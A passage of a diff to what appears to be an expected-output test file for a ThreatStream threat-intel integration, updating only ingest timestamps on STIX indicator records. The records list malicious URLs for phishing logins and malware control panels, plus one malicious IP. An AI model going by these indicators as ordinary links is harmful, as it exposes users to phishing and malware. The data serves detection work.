http://brokenhead.xyz/Work6/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work6/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:31.986Z\"}", "category": "threat", "type": "indicator", @@ -23883,7 +23883,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025543Z", + "ingested": "2021-12-14T14:57:43.118399291Z", "original": "{\"created\":\"2020-02-20T05:18:33.111Z\",\"description\":\"TS ID: 55330801593; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--b2cc241b-8f9a-494d-b842-74bc151bec7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-20T05:18:33.111Z\",\"name\":\"mal_url: http://febspxiii.xyz/DBY/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxiii.xyz/DBY/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:33.111Z\"}", "category": "threat", "type": "indicator", @@ -23934,7 +23934,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025550100Z", + "ingested": "2021-12-14T14:57:43.118399700Z", "original": "{\"created\":\"2020-02-20T05:18:47.389Z\",\"description\":\"TS ID: 55330801620; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ac992a06-7013-4af2-b5c0-5c99f556d5b0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-20T05:18:47.389Z\",\"name\":\"mal_url: http://rds2020.space/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rds2020.space/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:47.389Z\"}", "category": "threat", "type": "indicator", @@ -23985,7 +23985,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025557400Z", + "ingested": "2021-12-14T14:57:43.118400157Z", "original": "{\"created\":\"2020-02-20T05:18:47.406Z\",\"description\":\"TS ID: 55330801615; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--d723c08e-997d-483e-91e0-2ba6048e3683\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-02-20T05:18:47.406Z\",\"name\":\"mal_url: http://vysyyvyvm.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://vysyyvyvm.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:47.406Z\"}", "category": "threat", "type": "indicator", @@ -24037,7 +24037,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025564600Z", + "ingested": "2021-12-14T14:57:43.118400690Z", "original": "{\"created\":\"2020-02-20T05:18:47.424Z\",\"description\":\"TS ID: 55330801583; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--734a20dd-4f6e-4ca9-8eac-4cdd6b82a122\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T05:18:47.424Z\",\"name\":\"mal_url: http://makadicuosde.cf/makave/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://makadicuosde.cf/makave/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:47.424Z\"}", "category": "threat", "type": "indicator", @@ -24089,7 +24089,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025571700Z", + "ingested": "2021-12-14T14:57:43.118401081Z", "original": "{\"created\":\"2020-02-20T05:18:52.122Z\",\"description\":\"TS ID: 55328307475; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--e4109b4c-b56f-4f16-818f-0db54e50f5e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-20T05:18:52.122Z\",\"name\":\"mal_url: http://tailuong.com.vn/.gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tailuong.com.vn/.gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:52.122Z\"}", "category": "threat", "type": "indicator", @@ -24141,7 +24141,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025578900Z", + "ingested": "2021-12-14T14:57:43.118401463Z", "original": "{\"created\":\"2020-02-20T05:19:37.033Z\",\"description\":\"TS ID: 55328307484; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--4c7e5535-9899-4967-86bb-e303b03a1122\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:19:37.033Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work3/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work3/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:37.033Z\"}", "category": "threat", "type": "indicator", @@ -24193,7 +24193,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025586200Z", + "ingested": "2021-12-14T14:57:43.118401952Z", "original": "{\"created\":\"2020-02-20T05:19:37.099Z\",\"description\":\"TS ID: 55328307477; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ea537667-1f37-4050-bb51-85fee813e39c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T05:19:37.099Z\",\"name\":\"mal_url: http://epperfums.com/duck/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/duck/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:37.099Z\"}", "category": "threat", "type": "indicator", @@ -24245,7 +24245,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025593500Z", + "ingested": "2021-12-14T14:57:43.118402513Z", "original": "{\"created\":\"2020-02-20T05:19:44.991Z\",\"description\":\"TS ID: 55328307478; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--b6919ef9-68eb-48f5-9bc5-cdb35182e3d5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T05:19:44.991Z\",\"name\":\"mal_url: http://epperfums.com/dull/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/dull/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:44.991Z\"}", "category": "threat", "type": "indicator", @@ -24296,7 +24296,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025669400Z", + "ingested": "2021-12-14T14:57:43.118402954Z", "original": "{\"created\":\"2020-02-20T05:19:49.844Z\",\"description\":\"TS ID: 55330801566; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--ddf3b3c7-d5f7-42d7-b013-767315de4745\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-20T05:19:49.844Z\",\"name\":\"mal_url: http://f0404175.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0404175.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:49.844Z\"}", "category": "threat", "type": "indicator", @@ -24348,7 +24348,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025695300Z", + "ingested": "2021-12-14T14:57:43.118403709Z", "original": "{\"created\":\"2020-02-20T05:19:58.679Z\",\"description\":\"TS ID: 55330801607; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--12edd75d-2558-498f-93a6-b628c3a21f85\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:19:58.679Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/frega/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/frega/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:58.679Z\"}", "category": "threat", "type": "indicator", @@ -24400,7 +24400,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025701Z", + "ingested": "2021-12-14T14:57:43.118404236Z", "original": "{\"created\":\"2020-02-20T05:21:46.589Z\",\"description\":\"TS ID: 55328307479; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--7a99b0ea-a361-4d6f-9c75-a1cd9ac41b1b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:21:46.589Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work8/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work8/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:21:46.589Z\"}", "category": "threat", "type": "indicator", @@ -24452,7 +24452,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025705200Z", + "ingested": "2021-12-14T14:57:43.118404619Z", "original": "{\"created\":\"2020-02-20T05:22:19.894Z\",\"description\":\"TS ID: 55330801609; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--09479a9a-0c30-4029-a396-afa64343f065\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:22:19.894Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/em/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/em/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:22:19.894Z\"}", "category": "threat", "type": "indicator", @@ -24503,7 +24503,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025709600Z", + "ingested": "2021-12-14T14:57:43.118405009Z", "original": "{\"created\":\"2020-02-20T05:24:01.214Z\",\"description\":\"TS ID: 55330801569; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--434af7fc-410e-404d-8c8c-8875f92cb0c0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-20T05:24:01.214Z\",\"name\":\"mal_url: http://f0402912.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0402912.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:01.214Z\"}", "category": "threat", "type": "indicator", @@ -24554,7 +24554,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025734700Z", + "ingested": "2021-12-14T14:57:43.118405522Z", "original": "{\"created\":\"2020-02-20T05:24:21.239Z\",\"description\":\"TS ID: 55330801567; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--3ea0e805-8fa3-40ce-84e5-bf39318f35a6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-20T05:24:21.239Z\",\"name\":\"mal_url: http://f0404052.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0404052.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:21.239Z\"}", "category": "threat", "type": "indicator", @@ -24606,7 +24606,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025739600Z", + "ingested": "2021-12-14T14:57:43.118405993Z", "original": "{\"created\":\"2020-02-20T05:24:33.205Z\",\"description\":\"TS ID: 55330801581; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime\",\"id\":\"indicator--b9cccc62-550f-4f5b-bb32-f580c23fe382\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T05:24:33.205Z\",\"name\":\"mal_url: http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:33.205Z\"}", "category": "threat", "type": "indicator", @@ -24651,7 +24651,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025748800Z", + "ingested": "2021-12-14T14:57:43.118406440Z", "original": "{\"created\":\"2020-02-20T05:24:35.843Z\",\"description\":\"TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--314ecb7a-db3a-4a64-9c0c-1361891c26c3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-02-20T05:24:35.843Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:35.843Z\"}", "category": "threat", "type": "indicator", @@ -24703,7 +24703,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025754Z", + "ingested": "2021-12-14T14:57:43.118406886Z", "original": "{\"created\":\"2020-02-20T05:24:47.629Z\",\"description\":\"TS ID: 55330801610; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--d594d88f-2e74-4539-99a3-7fc7ae29ac7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:24:47.629Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/aps/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/aps/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:47.629Z\"}", "category": "threat", "type": "indicator", @@ -24755,7 +24755,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025759800Z", + "ingested": "2021-12-14T14:57:43.118407336Z", "original": "{\"created\":\"2020-02-20T05:24:47.645Z\",\"description\":\"TS ID: 55330801575; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--d20e7f50-caac-4054-b816-6f4a9a9283b9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T05:24:47.645Z\",\"name\":\"mal_url: http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:47.645Z\"}", "category": "threat", "type": "indicator", @@ -24807,7 +24807,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025767Z", + "ingested": "2021-12-14T14:57:43.118407753Z", "original": "{\"created\":\"2020-02-20T05:25:26.502Z\",\"description\":\"TS ID: 55328307491; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--fb3209c5-4de8-4554-9bb4-ed8cc2b19915\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-20T05:25:26.502Z\",\"name\":\"mal_url: http://instaboom-hello.site/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://instaboom-hello.site/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:26.502Z\"}", "category": "threat", "type": "indicator", @@ -24859,7 +24859,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025773800Z", + "ingested": "2021-12-14T14:57:43.118408143Z", "original": "{\"created\":\"2020-02-20T05:25:26.525Z\",\"description\":\"TS ID: 55328307488; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--592a57f8-b59a-4018-9167-307225a207ef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:25:26.525Z\",\"name\":\"mal_url: http://biznetvgator.com/greets/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://biznetvgator.com/greets/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:26.525Z\"}", "category": "threat", "type": "indicator", @@ -24911,7 +24911,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025780800Z", + "ingested": "2021-12-14T14:57:43.118408680Z", "original": "{\"created\":\"2020-02-20T05:25:29.508Z\",\"description\":\"TS ID: 55328307495; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--56e543f4-111a-4764-af25-ee784f35a7c6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:25:29.508Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/azrt/emma/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/azrt/emma/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:29.508Z\"}", "category": "threat", "type": "indicator", @@ -24963,7 +24963,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025787600Z", + "ingested": "2021-12-14T14:57:43.118409498Z", "original": "{\"created\":\"2020-02-20T05:25:29.532Z\",\"description\":\"TS ID: 55328307487; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--a2e1a901-7ad5-4be0-9fad-7e83cb7d35a7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-20T05:25:29.532Z\",\"name\":\"mal_url: http://brokenbrains.xyz/Pablo/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenbrains.xyz/Pablo/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:29.532Z\"}", "category": "threat", "type": "indicator", @@ -25015,7 +25015,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025794500Z", + "ingested": "2021-12-14T14:57:43.118409886Z", "original": "{\"created\":\"2020-02-21T02:51:41.341Z\",\"description\":\"TS ID: 55333174445; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--84d5a06f-cbc3-4504-b0d0-ea23b99182ba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-21T02:51:41.341Z\",\"name\":\"mal_url: http://nenengdsa.ug/QnSrw25SkhlxsF5P/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nenengdsa.ug/QnSrw25SkhlxsF5P/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:51:41.341Z\"}", "category": "threat", "type": "indicator", @@ -25066,7 +25066,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025801300Z", + "ingested": "2021-12-14T14:57:43.118410335Z", "original": "{\"created\":\"2020-02-21T02:51:50.176Z\",\"description\":\"TS ID: 55333174449; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--56cda4af-704b-41e7-8cc3-6140c163a22a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-21T02:51:50.176Z\",\"name\":\"mal_url: http://j1041747.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1041747.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:51:50.176Z\"}", "category": "threat", "type": "indicator", @@ -25118,7 +25118,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025805300Z", + "ingested": "2021-12-14T14:57:43.118410860Z", "original": "{\"created\":\"2020-02-21T02:51:50.296Z\",\"description\":\"TS ID: 55333174441; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--3a6903d8-e46b-4918-a99d-21ae21465bde\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-21T02:51:50.296Z\",\"name\":\"mal_url: http://sadhate.zzz.com.ua/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sadhate.zzz.com.ua/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:51:50.296Z\"}", "category": "threat", "type": "indicator", @@ -25170,7 +25170,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025810400Z", + "ingested": "2021-12-14T14:57:43.118411442Z", "original": "{\"created\":\"2020-02-21T02:52:28.296Z\",\"description\":\"TS ID: 55333174457; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ec1f4e5c-0878-4dcf-9141-4a83b8abeb2c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-21T02:52:28.296Z\",\"name\":\"mal_url: http://groysman.club/host/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://groysman.club/host/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:28.296Z\"}", "category": "threat", "type": "indicator", @@ -25222,7 +25222,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025815500Z", + "ingested": "2021-12-14T14:57:43.118411924Z", "original": "{\"created\":\"2020-02-21T02:52:31.697Z\",\"description\":\"TS ID: 55333174438; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--40502e97-56ae-4194-81d7-fc08ebff68c1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-21T02:52:31.697Z\",\"name\":\"mal_url: http://nortonlilly.info/ace/ts/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/ace/ts/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:31.697Z\"}", "category": "threat", "type": "indicator", @@ -25274,7 +25274,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025837200Z", + "ingested": "2021-12-14T14:57:43.118412425Z", "original": "{\"created\":\"2020-02-21T02:52:33.704Z\",\"description\":\"TS ID: 55333174439; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--d9ed2a5f-0f87-4d87-adec-7a925fc848e4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-21T02:52:33.704Z\",\"name\":\"mal_url: http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:33.704Z\"}", "category": "threat", "type": "indicator", @@ -25319,7 +25319,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025841Z", + "ingested": "2021-12-14T14:57:43.118412811Z", "original": "{\"created\":\"2020-02-21T02:52:34.992Z\",\"description\":\"TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime\",\"id\":\"indicator--097b92f4-6865-49db-8e59-2a89df364749\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-21T02:52:34.992Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:34.992Z\"}", "category": "threat", "type": "indicator", @@ -25371,7 +25371,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025846100Z", + "ingested": "2021-12-14T14:57:43.118413198Z", "original": "{\"created\":\"2020-02-21T02:52:35.038Z\",\"description\":\"TS ID: 55333174442; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--03ea9edc-6654-4287-b452-988c85380295\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-60\"],\"modified\":\"2020-02-21T02:52:35.038Z\",\"name\":\"mal_url: http://jusper.zzz.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jusper.zzz.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:35.038Z\"}", "category": "threat", "type": "indicator", @@ -25423,7 +25423,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025850900Z", + "ingested": "2021-12-14T14:57:43.118413585Z", "original": "{\"created\":\"2020-02-21T02:52:38.593Z\",\"description\":\"TS ID: 55333174440; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--99f64515-7513-4764-b278-987c5df8484b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-21T02:52:38.593Z\",\"name\":\"mal_url: http://azur.kl.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://azur.kl.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:38.593Z\"}", "category": "threat", "type": "indicator", @@ -25474,7 +25474,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025855Z", + "ingested": "2021-12-14T14:57:43.118414037Z", "original": "{\"created\":\"2020-02-21T02:53:25.758Z\",\"description\":\"TS ID: 55333174450; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--afdd7c21-d8c6-419e-84be-5c8b2ce1a829\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-21T02:53:25.758Z\",\"name\":\"mal_url: http://d98527ix.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 